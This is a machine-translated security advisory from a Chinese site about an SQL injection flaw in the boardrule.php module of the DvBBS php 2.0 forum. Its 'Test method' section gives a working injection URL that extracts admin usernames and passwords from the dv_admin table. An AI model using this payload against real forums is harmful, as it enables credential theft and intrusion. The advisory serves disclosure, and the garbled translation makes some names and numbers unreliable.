Move the net Forum DvBBS boardrule. php module SQL injection vulnerability-vulnerability warning-the black bar safety net

2009-10-12T00:00:00
ID MYHACK58:62200924990
Type myhack58
Reporter 佚名
Modified 2009-10-12T00:00:00

Description

Affected system: Move the net Forum Dvbbs php 2.0 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 3 6 2 8 2 DVBBS is a Aspsky. Net development and maintenance of open source ASP Web forum program. DvBBS does not properly filter user submitted to boardrule. php module groupboardid parameter, remote attacker can get through to the forum to submit malicious parameters a request to performSQL injectionattack. <*source: Securitylab. ir

Link: http://marc.info/?l=bugtraq&m=1 2 5 2 0 7 6 7 6 1 1 4 4 0 5&w=2 > Test method: -------------------------------------------------------------------------------- Warning The following procedures(methods)may carry offensive, for security research and teaching purposes. The user at your own risk! http://site.com/[Path]/boardrule. php? groupboardid=1//union//select//concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)//from%20dv_admin%20where%20id%20between%2 0 1%20and%2 0 4/*/

Recommendations: -------------------------------------------------------------------------------- Manufacturers patch: Dynamic network Forum \ -------- The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version: <http://www.dvbbs.net/>